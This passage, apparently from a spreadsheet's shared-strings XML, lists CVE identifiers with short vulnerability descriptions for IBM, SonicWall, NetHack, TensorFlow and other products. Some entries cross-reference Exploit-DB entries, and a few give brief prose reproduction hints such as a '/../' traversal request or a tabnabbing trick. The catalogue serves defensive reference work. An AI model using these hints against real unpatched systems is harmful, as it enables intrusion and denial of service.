  <si>
    <t>CVE-2020-4964</t>
  </si>
  <si>
    <t>IBM Jazz Team Server products contain an undisclosed vulnerability that could allow an authenticated user to present a customized message on the application which could be used to phish other users. IBM X-Force ID: 192419.</t>
  </si>
  <si>
    <t>CVE-2020-4965</t>
  </si>
  <si>
    <t>IBM Jazz Team Server products use weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 192422.</t>
  </si>
  <si>
    <t>CVE-2020-4966</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6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92423.</t>
  </si>
  <si>
    <t>CVE-2020-4967</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.3.0.1 could disclose sensitive information through HTTP headers which could be used in further attacks against the system. IBM X-Force ID: 192425.</t>
  </si>
  <si>
    <t>CVE-2020-4968</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 192427.</t>
  </si>
  <si>
    <t>CVE-2020-4969</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques.</t>
  </si>
  <si>
    <t>CVE-2020-4970</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.4, 5.2.5, and 5.2.6 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 192429.</t>
  </si>
  <si>
    <t>CVE-2020-4974</t>
  </si>
  <si>
    <t>IBM Jazz Foundation products are vulnerable to server side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 192434.</t>
  </si>
  <si>
    <t>CVE-2020-4975</t>
  </si>
  <si>
    <t>IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192435.</t>
  </si>
  <si>
    <t>CVE-2020-4976</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a local user to read and write specific files due to weak file permissions. IBM X-Force ID: 192469.</t>
  </si>
  <si>
    <t>CVE-2020-4977</t>
  </si>
  <si>
    <t>IBM Engineering Lifecycle Optimization - Publishing is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192470.</t>
  </si>
  <si>
    <t>CVE-2020-4979</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 is vulnerable to insecure inter-deployment communication. An attacker that is able to comprimise or spoof traffic between hosts may be able to execute arbitrary commands. IBM X-Force D: 192538.</t>
  </si>
  <si>
    <t>CVE-2020-4980</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 uses less secure methods for protecting data in transit between hosts when encrypt host connections is not enabled as well as data at rest. IBM X-Force ID: 192539.</t>
  </si>
  <si>
    <t>CVE-2020-4981</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.4.1 through 5.1.0.3 could allow a local privileged user to overwrite files due to improper input validation. IBM X-Force ID: 192541.</t>
  </si>
  <si>
    <t>CVE-2020-4983</t>
  </si>
  <si>
    <t>IBM Spectrum LSF 10.1 and IBM Spectrum LSF Suite 10.2 could allow a user on the local network who has privileges to submit LSF jobs to execute arbitrary commands. IBM X-Force ID: 192586.</t>
  </si>
  <si>
    <t>CVE-2020-4985</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 could allow an attacker to obtain sensitive information due to accepting body parameters in a query. IBM X-Force ID: 192642.</t>
  </si>
  <si>
    <t>CVE-2020-4987</t>
  </si>
  <si>
    <t>The IBM FlashSystem 900 user management GUI is vulnerable to stored cross-site scripting in code versions 1.5.2.8 and prior and 1.6.1.2 and prior. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2020-4988</t>
  </si>
  <si>
    <t>Loopback 8.0.0 contains a vulnerability that could allow an attacker to manipulate or pollute Javascript values and cause a denial of service or possibly execute code. IBM X-Force ID: 192706.</t>
  </si>
  <si>
    <t>CVE-2020-4989</t>
  </si>
  <si>
    <t>IBM Engineering Workflow Management 7.0, 7.0.1, and 7.0.2 and IBM Rational Team Concert 6.0.6 and 6.0.0.1 could allow an authenticated user to obtain sensitive information about build definitions. IBM X-Force ID: 192707.</t>
  </si>
  <si>
    <t>CVE-2020-4990</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 192710.</t>
  </si>
  <si>
    <t>CVE-2020-4992</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.16 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 192737.</t>
  </si>
  <si>
    <t>CVE-2020-4993</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 when decompressing or verifying signature of zip files processes data in a way that may be vulnerable to path traversal attacks. IBM X-Force ID: 192905.</t>
  </si>
  <si>
    <t>CVE-2020-4994</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 10.0.1.0 through 10.0.1.4 and 2018.4.1.0 through 2018.4.1.17 could allow a remote user to cause a temporary denial of service by sending invalid HTTP requests. IBM X-Force ID: 192906.</t>
  </si>
  <si>
    <t>CVE-2020-4995</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 does not invalidate session after logout which could allow a user to obtain sensitive information from another users' session. IBM X-Force ID: 192912.</t>
  </si>
  <si>
    <t>CVE-2020-4996</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow a local user to obtain sensitive information via the capturing of screenshots of authentication credentials. IBM X-Force ID: 192913.</t>
  </si>
  <si>
    <t>CVE-2020-4997</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192914</t>
  </si>
  <si>
    <t>CVE-2020-5000</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager 3.0.2 and 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192952.</t>
  </si>
  <si>
    <t>CVE-2020-5003</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager 3.2.4 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 192956.</t>
  </si>
  <si>
    <t>CVE-2020-5004</t>
  </si>
  <si>
    <t>IBM Jazz Foundation products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192957.</t>
  </si>
  <si>
    <t>CVE-2020-5008</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 10.0.0.0 through 10.0.1.0 and 2018.4.1.0 through 2018.4.1.14 stores sensitive information in GET request parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 193033.</t>
  </si>
  <si>
    <t>CVE-2020-5013</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 may vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 193245.</t>
  </si>
  <si>
    <t>CVE-2020-5014</t>
  </si>
  <si>
    <t>IBM DataPower Gateway V10 and V2018 could allow a local attacker with administrative privileges to execute arbitrary code on the system using a server-side requesr forgery attack. IBM X-Force ID: 193247.</t>
  </si>
  <si>
    <t>CVE-2020-5015</t>
  </si>
  <si>
    <t>IBM Elastic Storage System 6.0.0 through 6.0.1.2 and IBM Elastic Storage Server 5.3.0 through 5.3.6.2 could allow a remote attacker to cause a denial of service by sending malformed UDP requests. IBM X-Force ID: 193486.</t>
  </si>
  <si>
    <t>CVE-2020-5016</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to traverse directories on the system. When application security is disabled and JAX-RPC applications are present, an attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary xml files on the system. This does not occur if Application security is enabled. IBM X-Force ID: 193556.</t>
  </si>
  <si>
    <t>CVE-2020-5017</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 may allow a local user to obtain access to information beyond their intended role and permissions. IBM X-Force ID: 193653.</t>
  </si>
  <si>
    <t>CVE-2020-5018</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 may include sensitive information in its URLs increasing the risk of such information being caputured by an attacker. IBM X-Force ID: 193654.</t>
  </si>
  <si>
    <t>CVE-2020-5019</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to inject HTTP HOST header, which will allow the attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 193655.</t>
  </si>
  <si>
    <t>CVE-2020-5020</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6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93656.</t>
  </si>
  <si>
    <t>CVE-2020-5021</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 does not invalidate session after a password reset which could allow a local user to impersonate another user on the system. IBM X-Force ID: 193657.</t>
  </si>
  <si>
    <t>CVE-2020-5022</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 may allow unauthenticated and unauthorized access to VDAP proxy which can result in an attacker obtaining information they are not authorized to access. IBM X-Force ID: 193658.</t>
  </si>
  <si>
    <t>CVE-2020-5023</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.7 could allow a remote user to inject arbitrary data iwhich could cause the serivce to crash due to excess resource consumption. IBM X-Force ID: 193659.</t>
  </si>
  <si>
    <t>CVE-2020-5024</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow an unauthenticated attacker to cause a denial of service due a hang in the SSL handshake response. IBM X-Force ID: 193660.</t>
  </si>
  <si>
    <t>CVE-2020-5025</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 db2fm is vulnerable to a buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code on the system with root privileges. IBM X-Force ID: 193661.</t>
  </si>
  <si>
    <t>CVE-2020-5030</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 193737.</t>
  </si>
  <si>
    <t>CVE-2020-5031</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 193738.</t>
  </si>
  <si>
    <t>CVE-2020-5032</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 in some configurations may be vulnerable to a temporary denial of service attack when sent particular payloads. IBM X-Force ID: 194178.</t>
  </si>
  <si>
    <t>CVE-2020-5129</t>
  </si>
  <si>
    <t>A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-5130</t>
  </si>
  <si>
    <t>SonicOS SSLVPN LDAP login request allows remote attackers to cause external service interaction (DNS) due to improper validation of the request. This vulnerability impact SonicOS version 6.5.4.4-44n and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-5131</t>
  </si>
  <si>
    <t>SonicWall NetExtender Windows client vulnerable to arbitrary file write vulnerability, this allows attacker to overwrite a DLL and execute code with the same privilege in the host operating system. This vulnerability impact SonicWall NetExtender Windows client version 9.0.815 and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-5132</t>
  </si>
  <si>
    <t>SonicWall SSL-VPN products and SonicWall firewall SSL-VPN feature misconfiguration leads to possible DNS flaw known as domain name collision vulnerability. When the users publicly display their organization’s internal domain names in the SSL-VPN authentication page, an attacker with knowledge of internal domain names can potentially take advantage of this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-5133</t>
  </si>
  <si>
    <t>A vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service due to buffer overflow, which leads to a firewall crash. This vulnerability affected SonicOS Gen 6 version 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5134</t>
  </si>
  <si>
    <t>A vulnerability in SonicOS allows an authenticated attacker to cause out-of-bound invalid file reference leads to a firewall crash. This vulnerability affected SonicOS Gen 6 version 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5135</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5136</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in SonicOS allows an authenticated attacker to cause Denial of Service (DoS) in the SSL-VPN and virtual assist portal, which leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5137</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service and leads to firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5138</t>
  </si>
  <si>
    <t>A Heap Overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service and leads to SonicOS crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5139</t>
  </si>
  <si>
    <t>A vulnerability in SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS) due to the release of Invalid pointer and leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5140</t>
  </si>
  <si>
    <t>A vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service by sending a malicious HTTP request that leads to memory addresses leak. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5141</t>
  </si>
  <si>
    <t>A vulnerability in SonicOS allows a remote unauthenticated attacker to brute force Virtual Assist ticket ID in the firewall SSLVPN service. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5142</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability exists in the SonicOS SSLVPN web interface. A remote unauthenticated attacker is able to store and potentially execute arbitrary JavaScript code in the firewall SSLVPN portal. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5143</t>
  </si>
  <si>
    <t>SonicOS SSLVPN login page allows a remote unauthenticated attacker to perform firewall management administrator username enumeration based on the server responses. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-5144</t>
  </si>
  <si>
    <t>SonicWall Global VPN client version 4.10.4.0314 and earlier allows unprivileged windows user to elevate privileges to SYSTEM through loaded process hijacking vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-5145</t>
  </si>
  <si>
    <t>SonicWall Global VPN client version 4.10.4.0314 and earlier have an insecure library loading (DLL hijacking) vulnerability. Successful exploitation could lead to remote code execution in the target system.</t>
  </si>
  <si>
    <t>CVE-2020-5146</t>
  </si>
  <si>
    <t>A vulnerability in SonicWall SMA100 appliance allow an authenticated management-user to perform OS command injection using HTTP POST parameters. This vulnerability affected SMA100 Appliance version 10.2.0.2-20sv and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-5147</t>
  </si>
  <si>
    <t>SonicWall NetExtender Windows client vulnerable to unquoted service path vulnerability, this allows a local attacker to gain elevated privileges in the host operating system. This vulnerability impact SonicWall NetExtender Windows client version 10.2.300 and earlier.</t>
  </si>
  <si>
    <t>exploits/windows/local/50212.txt</t>
  </si>
  <si>
    <t>SonicWall NetExtender 10.2.0.300 -  Unquoted Service Path</t>
  </si>
  <si>
    <t>2021-08-17</t>
  </si>
  <si>
    <t>CVE-2020-5148</t>
  </si>
  <si>
    <t>SonicWall SSO-agent default configuration uses NetAPI to probe the associated IP's in the network, this client probing method allows a potential attacker to capture the password hash of the privileged user and potentially forces the SSO Agent to authenticate allowing an attacker to bypass firewall access controls.</t>
  </si>
  <si>
    <t>CVE-2020-5179</t>
  </si>
  <si>
    <t>Comtech Stampede FX-1010 7.4.3 devices allow remote authenticated administrators to execute arbitrary OS commands by navigating to the Diagnostics Ping page and entering shell metacharacters in the Target IP address field. (In some cases, authentication can be achieved with the comtech password for the comtech account.)</t>
  </si>
  <si>
    <t>CVE-2020-5180</t>
  </si>
  <si>
    <t>Viscosity 1.8.2 on Windows and macOS allows an unprivileged user to set a subset of OpenVPN parameters, which can be used to load a malicious library into the memory of the OpenVPN process, leading to limited local privilege escalation. (When a VPN connection is initiated using a TLS/SSL client profile, the privileges are dropped, and the library will be loaded, resulting in arbitrary code execution as a user with limited privileges. This greatly reduces the impact of the vulnerability.)</t>
  </si>
  <si>
    <t>CVE-2020-5182</t>
  </si>
  <si>
    <t>The J-BusinessDirectory extension before 5.2.9 for Joomla! allows Reverse Tabnabbing. In some configurations, the link to the business website can be entered by any user. If it doesn't contain rel="noopener" (or similar attributes such as noreferrer), the tabnabbing may occur. To reproduce the bug, create a business with a website link that contains JavaScript to exploit the window.opener property (for example, by setting window.opener.location).</t>
  </si>
  <si>
    <t>CVE-2020-5183</t>
  </si>
  <si>
    <t>FTPGetter Professional 5.97.0.223 is vulnerable to a memory corruption bug when a user sends a specially crafted string to the application. This memory corruption bug can possibly be classified as a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-5186</t>
  </si>
  <si>
    <t>DNN (formerly DotNetNuke) through 9.4.4 allows XSS (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-5187</t>
  </si>
  <si>
    <t>DNN (formerly DotNetNuke) through 9.4.4 allows Path Traversal (issue 2 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-5188</t>
  </si>
  <si>
    <t>DNN (formerly DotNetNuke) through 9.4.4 has Insecure Permissions.</t>
  </si>
  <si>
    <t>CVE-2020-5191</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.</t>
  </si>
  <si>
    <t>exploits/php/webapps/47841.txt</t>
  </si>
  <si>
    <t>Hospital Management System 4.0 - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-5192</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.</t>
  </si>
  <si>
    <t>exploits/php/webapps/47840.txt</t>
  </si>
  <si>
    <t>Hospital Management System 4.0 - 'searchdata' SQL Injection</t>
  </si>
  <si>
    <t>CVE-2020-5193</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple reflected XSS vulnerabilities via the searchdata or Doctorspecialization parameter.</t>
  </si>
  <si>
    <t>CVE-2020-5194</t>
  </si>
  <si>
    <t>The zip API endpoint in Cerberus FTP Server 8 allows an authenticated attacker without zip permission to use the zip functionality via an unrestricted API endpoint. Improper permission verification occurs when calling the file/ajax_download_zip/zip_name endpoint. The result is that a user without permissions can zip and download files even if they do not have permission to view whether the file exists.</t>
  </si>
  <si>
    <t>CVE-2020-5195</t>
  </si>
  <si>
    <t>Reflected XSS through an IMG element in Cerberus FTP Server prior to versions 11.0.1 and 10.0.17 allows a remote attacker to execute arbitrary JavaScript or HTML via a crafted public folder URL. This occurs because of the folder_up.png IMG element not properly sanitizing user-inserted directory paths. The path modification must be done on a publicly shared folder for a remote attacker to insert arbitrary JavaScript or HTML. The vulnerability impacts anyone who clicks the malicious link crafted by the attacker.</t>
  </si>
  <si>
    <t>CVE-2020-5196</t>
  </si>
  <si>
    <t>Cerberus FTP Server Enterprise Edition prior to versions 11.0.3 and 10.0.18 allows an authenticated attacker to create files, display hidden files, list directories, and list files without the permission to zip and download (or unzip and upload) files. There are multiple ways to bypass certain permissions by utilizing the zip and unzip features. As a result, users without permission can see files, folders, and hidden files, and can create directories without permission.</t>
  </si>
  <si>
    <t>CVE-2020-5197</t>
  </si>
  <si>
    <t>An issue was discovered in GitLab Community Edition (CE) and Enterprise Edition (EE) 5.1 through 12.6.1. It has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-5202</t>
  </si>
  <si>
    <t>apt-cacher-ng through 3.3 allows local users to obtain sensitive information by hijacking the hardcoded TCP port. The /usr/lib/apt-cacher-ng/acngtool program attempts to connect to apt-cacher-ng via TCP on localhost port 3142, even if the explicit SocketPath=/var/run/apt-cacher-ng/socket command-line option is passed. The cron job /etc/cron.daily/apt-cacher-ng (which is active by default) attempts this periodically. Because 3142 is an unprivileged port, any local user can try to bind to this port and will receive requests from acngtool. There can be sensitive data in these requests, e.g., if AdminAuth is enabled in /etc/apt-cacher-ng/security.conf. This sensitive data can leak to unprivileged local users that manage to bind to this port before the apt-cacher-ng daemon can.</t>
  </si>
  <si>
    <t>CVE-2020-5203</t>
  </si>
  <si>
    <t>In Fat-Free Framework 3.7.1, attackers can achieve arbitrary code execution if developers choose to pass user controlled input (e.g., $_REQUEST, $_GET, or $_POST) to the framework's Clear method.</t>
  </si>
  <si>
    <t>CVE-2020-5204</t>
  </si>
  <si>
    <t>In uftpd before 2.11, there is a buffer overflow vulnerability in handle_PORT in ftpcmd.c that is caused by a buffer that is 16 bytes large being filled via sprintf() with user input based on the format specifier string %d.%d.%d.%d. The 16 byte size is correct for valid IPv4 addresses (len(&amp;#39;255.255.255.255&amp;#39;) == 16), but the format specifier %d allows more than 3 digits. This has been fixed in version 2.11</t>
  </si>
  <si>
    <t>CVE-2020-5205</t>
  </si>
  <si>
    <t>In Pow (Hex package) before 1.0.16, the use of Plug.Session in Pow.Plug.Session is susceptible to session fixation attacks if a persistent session store is used for Plug.Session, such as Redis or a database. Cookie store, which is used in most Phoenix apps, doesn't have this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-5206</t>
  </si>
  <si>
    <t>In Opencast before 7.6 and 8.1, using a remember-me cookie with an arbitrary username can cause Opencast to assume proper authentication for that user even if the remember-me cookie was incorrect given that the attacked endpoint also allows anonymous access. This way, an attacker can, for example, fake a remember-me token, assume the identity of the global system administrator and request non-public content from the search service without ever providing any proper authentication. This problem is fixed in Opencast 7.6 and Opencast 8.1</t>
  </si>
  <si>
    <t>CVE-2020-5207</t>
  </si>
  <si>
    <t>In Ktor before 1.3.0, request smuggling is possible when running behind a proxy that doesn't handle Content-Length and Transfer-Encoding properly or doesn't handle \n as a headers separator.</t>
  </si>
  <si>
    <t>CVE-2020-5208</t>
  </si>
  <si>
    <t>It's been found that multiple functions in ipmitool before 1.8.19 neglect proper checking of the data received from a remote LAN party, which may lead to buffer overflows and potentially to remote code execution on the ipmitool side. This is especially dangerous if ipmitool is run as a privileged user. This problem is fixed in version 1.8.19.</t>
  </si>
  <si>
    <t>CVE-2020-5209</t>
  </si>
  <si>
    <t>In NetHack before 3.6.5, unknown options starting with -de and -i can cause a buffer overflow resulting in a crash or remote code execution/privilege escalation. This vulnerability affects systems that have NetHack installed suid/sgid and shared systems that allow users to influence command line options. Users should upgrade to NetHack 3.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5210</t>
  </si>
  <si>
    <t>In NetHack before 3.6.5, an invalid argument to the -w command line option can cause a buffer overflow resulting in a crash or remote code execution/privilege escalation. This vulnerability affects systems that have NetHack installed suid/sgid and shared systems that allow users to influence command line options. Users should upgrade to NetHack 3.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5211</t>
  </si>
  <si>
    <t>In NetHack before 3.6.5, an invalid extended command in value for the AUTOCOMPLETE configuration file option can cause a buffer overflow resulting in a crash or remote code execution/privilege escalation. This vulnerability affects systems that have NetHack installed suid/sgid and shared systems that allow users to upload their own configuration files. Users should upgrade to NetHack 3.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5212</t>
  </si>
  <si>
    <t>In NetHack before 3.6.5, an extremely long value for the MENUCOLOR configuration file option can cause a buffer overflow resulting in a crash or remote code execution/privilege escalation. This vulnerability affects systems that have NetHack installed suid/sgid and shared systems that allow users to upload their own configuration files. Users should upgrade to NetHack 3.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5213</t>
  </si>
  <si>
    <t>In NetHack before 3.6.5, too long of a value for the SYMBOL configuration file option can cause a buffer overflow resulting in a crash or remote code execution/privilege escalation. This vulnerability affects systems that have NetHack installed suid/sgid and shared systems that allow users to upload their own configuration files. Users should upgrade to NetHack 3.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5214</t>
  </si>
  <si>
    <t>In NetHack before 3.6.5, detecting an unknown configuration file option can cause a buffer overflow resulting in a crash or remote code execution/privilege escalation. This vulnerability affects systems that have NetHack installed suid/sgid and shared systems that allow users to upload their own configuration files. Users should upgrade to NetHack 3.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5215</t>
  </si>
  <si>
    <t>In TensorFlow before 1.15.2 and 2.0.1, converting a string (from Python) to a tf.float16 value results in a segmentation fault in eager mode as the format checks for this use case are only in the graph mode. This issue can lead to denial of service in inference/training where a malicious attacker can send a data point which contains a string instead of a tf.float16 value. Similar effects can be obtained by manipulating saved models and checkpoints whereby replacing a scalar tf.float16 value with a scalar string will trigger this issue due to automatic conversions. This can be easily reproduced by tf.constant("hello", tf.float16), if eager execution is enabled. This issue is patched in TensorFlow 1.15.1 and 2.0.1 with this vulnerability patched. TensorFlow 2.1.0 was released after we fixed the issue, thus it is not affected. Users are encouraged to switch to TensorFlow 1.15.1, 2.0.1 or 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-5216</t>
  </si>
  <si>
    <t>In Secure Headers (RubyGem secure_headers), a directive injection vulnerability is present in versions before 3.9.0, 5.2.0, and 6.3.0. If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline. This has been fixed in 6.3.0, 5.2.0, and 3.9.0.</t>
  </si>
  <si>
    <t>CVE-2020-5217</t>
  </si>
  <si>
